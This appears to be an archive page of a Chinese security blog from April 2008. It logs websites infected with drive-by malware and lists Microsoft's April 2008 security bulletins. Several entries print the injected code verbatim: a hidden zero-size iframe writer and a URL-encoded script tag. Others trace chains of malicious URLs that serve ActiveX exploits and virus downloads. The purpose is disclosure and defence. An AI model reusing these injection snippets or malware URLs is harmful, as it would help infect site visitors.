This theme is downloaded from wordpress themes website.

Archive for April, 2008

4月15日挂马简报

航模空间-www.hyair.cn被插入恶意代码:

http://aaa.77xxmm.cn/new858.htm?075

Popularity: 6% [?]

网站挂马记录 GreySign 15 Apr 2008 No Comments

4月14日挂马简报

中国教育技术(www.etr.com.cn)被插入恶意代码:

http://51yes.ocry.com/click2.js?id=259865365&logo=1里包含了恶意连接:

http://59gua.com/page/add_54738542.htm

Popularity: 8% [?]

网站挂马记录 GreySign 14 Apr 2008 No Comments

4月13日挂马简报

365安全图书网站(365anquan.com)包含的JS文件被插入恶意代码:

document.writeln(”<iframe height=0 width=0 src=\”http:\/\/59gua.com\/page\/add_0853223.htm\”><\/iframe>”);

Popularity: 7% [?]

网站挂马记录 GreySign 13 Apr 2008 No Comments

4月12日挂马简报

邯郸IT网(http://www.hdit.cn/)被插入恶意代码:

http://a.158dm.com/b2.htm

Popularity: 7% [?]

网站挂马记录 GreySign 12 Apr 2008 No Comments

警惕:天极搜索被插入恶意代码

发布日期:2008-4-12

最后更新日期:2008-4-12   1737GMT
 来自:知道安全

情况:天极下载首页调用的JS文件(www.mydown.com/TLimages/mydown/js/weekurl.js)被嵌入恶意代码,访客在访问过程中可能会遭受到包含REAL漏洞,MS06014,暴风影音漏洞,联众世界漏洞,百度搜霸漏洞的网页的ActiveX攻击。 详细:

[wide]http://www.mydown.com
    [script]http://www.mydown.com/TLimages/mydown/js/weekurl.js
        [frame]http://xxx3.315666.net/my.html
            [frame]http://xxx3.315666.net/news.html
                [virus]http://user1.33220.net/Baidu.cab
                [MS06014]http://user1.33220.net/ms06014.js
                    [virus]http://user1.33220.net/bak.css
                [讯雷]http://user1.33220.net/Thunder.html
                    [virus]http://user1.33225.net/bak.css
                [联众]http://user1.33220.net/GLWORLD.html
                    [virus]http://user1.33220.net/bak.css
                [暴风]http://user1.33220.net/StormII.html
                    [virus]http://user1.33220.net/bak.css
                [REAL]http://user1.33220.net/Real.html
                    [virus]http://user1.33220.net/bak.css
                [REAL]http://user1.33220.net/real.js
                    [virus]http://user1.33220.net/bak.css

推荐的应对方法:

在你的电脑里将user1.33220.net添加到HOSTS文件进行屏蔽。

安装365门神(WESEC)软件,对IE浏览器在打开网站的时候进行保护,拦截来自网络带有恶意代码的网页攻击。使用帮助和下载:http://www.scanw.com/

Popularity: 5% [?]

网站挂马记录 GreySign 12 Apr 2008 No Comments

2008年4月微软安全公告

严重等级 5 个:

1. MS08-018: Microsoft Project 中的漏洞可能允许远程执行代码 (950183)

2. MS08-021: GDI 中的漏洞可能允许远程执行代码 (948590)

3. MS08-022: VBScript 和 JScript 脚本引擎中的漏洞可能允许远程执行代码 (944338)

4. MS08-023: ActiveX Kill Bit 的安全更新 (948881)

5. MS08-024: Internet Explorer 的累积性安全更新 (947864)

重要等级 3 个:

1. MS08-019: Microsoft Visio 中的漏洞可能允许远程执行代码 (949032)

2. MS08-020: DNS 客户端中的漏洞可能允许欺骗 (945553)

3. MS08-025: Windows 内核中的漏洞可能允许特权提升 (941693)

Microsoft 安全公告摘要(2008 年 4 月):
http://www.microsoft.com/china/technet/security/bulletin/ms08-apr.mspx

Popularity: 14% [?]

漏洞公告 GreySign 12 Apr 2008 No Comments

4月11日挂马简报

www.ctf2.com被插入恶意代码:

www.52m6.com/mm/tk01.htm

Popularity: 4% [?]

网站挂马记录 GreySign 11 Apr 2008 No Comments

警惕:周大福网站被插入恶意代码

发布日期:2008-4-11

最后更新日期:2008-4-11   1737GMT来自:知道安全

情况:

周大福网站(www.chowtaifook.com)页面底部被插入恶意代码,访客在访问过程中可能会遭受到包含REAL漏洞,MS06014,暴风影音漏洞,联众世界漏洞,PPS网络电视漏洞,百度搜霸漏洞的网页的ActiveX攻击。

详细:

[wide]http://www.chowtaifook.com
    [frame]http://www.52m6.com/mm/tk01.htm
        [MS06014]http://www.52m6.com/14.htm
                  [virus]http://ccc.52gol.com/xx.exe
        [not found]http://www.52m6.com/mm/0.htm
        [not found]http://www.52m6.com/mm/0.htm
        [暴风]http://www.52m6.com/bfyy.htm
                  [virus]http://ccc.52gol.com/xx.exe
        [not found]http://www.52m6.com/mm/0.htm
        [联众]http://www.52m6.com/lz.htm
                [virus]http://ccc.52gol.com/xx.exe
        [not found]http://www.52m6.com/mm/0.htm
        [real]http://www.52m6.com/real.htm
                [virus]http://ccc.52gol.com/xx.exe
        [real11]http://www.52m6.com/real11.htm
                [virus]http://ccc.52gol.com/xx.exe

推荐的应对方法:

在你的电脑里将www.52m6.comccc.52gol.com添加到HOSTS文件进行屏蔽。

安装365门神(WESEC)软件,对IE浏览器在打开网站的时候进行保护,拦截来自网络带有恶意代码的网页攻击。使用帮助和下载:http://www.scanw.com/

 

Popularity: 5% [?]

网站挂马记录 GreySign 11 Apr 2008 No Comments

警惕:暴雪玩家论坛被插入恶意代码

发布日期:2008-4-10

最后更新日期:2008-4-10   1837GMT

来自:知道安全

情况:暴雪玩家论坛(bngamer.com/bbs)的网页代码里包含的一个JS文件被黑客以IFRAME方式添加恶意代码连接,访客在访问过程中可能会遭受到包含REAL漏洞,MS06014,暴风影音漏洞,联众世界漏洞,PPS网络电视漏洞,百度搜霸漏洞的网页的ActiveX攻击

详细:

[wide]http://bngamer.com/bbs
    [script]http://bngamer.com/adfile/globalfooter2.js
        [frame]http://x1.315666.net/m10.html?bng1
            [frame]http://x1.315666.net/news.html
                [script]http://user1.33220.net/ms06014.js
                    [virus]http://user1.33220.net/bak.css
                [frame]http://user1.33220.net/Thunder.html
                    [virus]http://user1.33220.net/bak.css
                [frame]http://user1.33220.net/GLWORLD.html
                    [virus]http://user1.33225.net/bak.css
                [frame]http://user1.33220.net/StormII.html
                    [virus]http://user1.33220.net/bak.css
                [frame]http://user1.33220.net/Real.html
                    [virus]http://user1.33220.net/bak.css
                [script]http://x1.315666.net/http://user1.33220.net/real.js
                    [virus]http://user1.33220.net/bak.css

推荐的应对方法:

在你的电脑里将user1.33220.netx1.315666.net添加到HOSTS文件进行屏蔽。

安装365门神(WESEC)软件,对IE浏览器在打开网站的时候进行保护,拦截来自网络带有恶意代码的网页攻击。使用帮助和下载:http://www.scanw.com/

Popularity: 5% [?]

网站挂马记录 GreySign 10 Apr 2008 No Comments

4月10日挂马简报

因特思互联纪录(hXXp://www.ytsjl.com/)被插入恶意代码:

<script src=http://%76%63%63%64%2E%63%6E></script>

Popularity: 4% [?]

网站挂马记录 GreySign 10 Apr 2008 No Comments

« Previous PageNext Page »

Recommended: Buy movies online.